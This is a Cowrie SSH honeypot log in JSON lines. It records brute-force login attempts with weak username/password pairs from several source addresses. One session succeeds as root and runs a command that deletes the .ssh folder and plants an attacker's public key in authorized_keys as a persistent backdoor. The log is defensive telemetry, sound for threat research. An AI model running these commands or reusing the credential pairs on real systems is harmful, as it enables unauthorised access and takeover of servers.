{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":41630,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced460c16c4a","protocol":"ssh","message":"New connection: 5.202.105.236:41630 (1.2.3.4:22) [session: ced460c16c4a]","sensor":"my-vps","timestamp":"2025-09-09T00:58:52.675737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:58:52.690854Z","src_ip":"5.202.105.236","session":"ced460c16c4a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:58:52.848507Z","src_ip":"5.202.105.236","session":"ced460c16c4a"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"qwerty","message":"login attempt [hammer/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:58:53.453211Z","src_ip":"5.202.105.236","session":"ced460c16c4a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:58:54.588160Z","src_ip":"5.202.105.236","session":"ced460c16c4a"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":39504,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b395893baf","protocol":"ssh","message":"New connection: 152.32.129.236:39504 (1.2.3.4:22) [session: 82b395893baf]","sensor":"my-vps","timestamp":"2025-09-09T00:58:58.709887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:58:58.710907Z","src_ip":"152.32.129.236","session":"82b395893baf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:58:58.974486Z","src_ip":"152.32.129.236","session":"82b395893baf"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"vladimir@123","message":"login attempt [vladimir/vladimir@123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:59:00.100315Z","src_ip":"152.32.129.236","session":"82b395893baf"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:59:01.365591Z","src_ip":"152.32.129.236","session":"82b395893baf"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":57037,"dst_ip":"1.2.3.4","dst_port":22,"session":"af8ebc941287","protocol":"ssh","message":"New connection: 103.100.209.195:57037 (1.2.3.4:22) [session: af8ebc941287]","sensor":"my-vps","timestamp":"2025-09-09T00:59:01.930435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:59:01.936389Z","src_ip":"103.100.209.195","session":"af8ebc941287"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:59:02.137535Z","src_ip":"103.100.209.195","session":"af8ebc941287"}
{"eventid":"cowrie.login.failed","username":"z","password":"12345678","message":"login attempt [z/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:59:02.952554Z","src_ip":"103.100.209.195","session":"af8ebc941287"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:59:04.160245Z","src_ip":"103.100.209.195","session":"af8ebc941287"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63260,"dst_ip":"1.2.3.4","dst_port":22,"session":"c498043a1189","protocol":"ssh","message":"New connection: 217.72.205.35:63260 (1.2.3.4:22) [session: c498043a1189]","sensor":"my-vps","timestamp":"2025-09-09T00:59:04.516949Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:59:04.518643Z","src_ip":"217.72.205.35","session":"c498043a1189"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43080,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c7f144eac5d","protocol":"ssh","message":"New connection: 43.156.132.147:43080 (1.2.3.4:22) [session: 4c7f144eac5d]","sensor":"my-vps","timestamp":"2025-09-09T00:59:41.861099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:59:41.862246Z","src_ip":"43.156.132.147","session":"4c7f144eac5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:59:42.106199Z","src_ip":"43.156.132.147","session":"4c7f144eac5d"}
{"eventid":"cowrie.login.failed","username":"support","password":"support123","message":"login attempt [support/support123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:59:43.121950Z","src_ip":"43.156.132.147","session":"4c7f144eac5d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:59:44.369305Z","src_ip":"43.156.132.147","session":"4c7f144eac5d"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":41750,"dst_ip":"1.2.3.4","dst_port":22,"session":"c466a45cc3d2","protocol":"ssh","message":"New connection: 103.100.209.195:41750 (1.2.3.4:22) [session: c466a45cc3d2]","sensor":"my-vps","timestamp":"2025-09-09T01:00:09.291626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:09.298378Z","src_ip":"103.100.209.195","session":"c466a45cc3d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:09.495281Z","src_ip":"103.100.209.195","session":"c466a45cc3d2"}
{"eventid":"cowrie.login.failed","username":"debian","password":"abc123","message":"login attempt [debian/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:00:10.293642Z","src_ip":"103.100.209.195","session":"c466a45cc3d2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:11.500674Z","src_ip":"103.100.209.195","session":"c466a45cc3d2"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":34734,"dst_ip":"1.2.3.4","dst_port":22,"session":"85606097eec7","protocol":"ssh","message":"New connection: 5.202.105.236:34734 (1.2.3.4:22) [session: 85606097eec7]","sensor":"my-vps","timestamp":"2025-09-09T01:00:13.169674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:13.191411Z","src_ip":"5.202.105.236","session":"85606097eec7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:13.328506Z","src_ip":"5.202.105.236","session":"85606097eec7"}
{"eventid":"cowrie.login.failed","username":"boris","password":"pass","message":"login attempt [boris/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T01:00:13.917977Z","src_ip":"5.202.105.236","session":"85606097eec7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34658,"dst_ip":"1.2.3.4","dst_port":22,"session":"110c3154e320","protocol":"ssh","message":"New connection: 152.32.129.236:34658 (1.2.3.4:22) [session: 110c3154e320]","sensor":"my-vps","timestamp":"2025-09-09T01:00:14.024050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:14.024811Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:14.995507Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:15.066983Z","src_ip":"5.202.105.236","session":"85606097eec7"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Qwe!","message":"login attempt [root/123456Qwe!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:00:16.051239Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:00:16.586614Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:00:16.587634Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:00:16.589368Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:16.844873Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:00:17.463588Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:00:17.464410Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:00:17.720047Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:17.721002Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f9c872c5c21","protocol":"ssh","message":"New connection: 152.32.129.236:34672 (1.2.3.4:22) [session: 3f9c872c5c21]","sensor":"my-vps","timestamp":"2025-09-09T01:00:17.856788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:17.857683Z","src_ip":"152.32.129.236","session":"3f9c872c5c21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:18.053380Z","src_ip":"152.32.129.236","session":"3f9c872c5c21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:00:18.874839Z","src_ip":"152.32.129.236","session":"3f9c872c5c21"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:20.072561Z","src_ip":"152.32.129.236","session":"3f9c872c5c21"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34674,"dst_ip":"1.2.3.4","dst_port":22,"session":"04d96e3e4e51","protocol":"ssh","message":"New connection: 152.32.129.236:34674 (1.2.3.4:22) [session: 04d96e3e4e51]","sensor":"my-vps","timestamp":"2025-09-09T01:00:20.270931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:20.272162Z","src_ip":"152.32.129.236","session":"04d96e3e4e51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:20.471822Z","src_ip":"152.32.129.236","session":"04d96e3e4e51"}
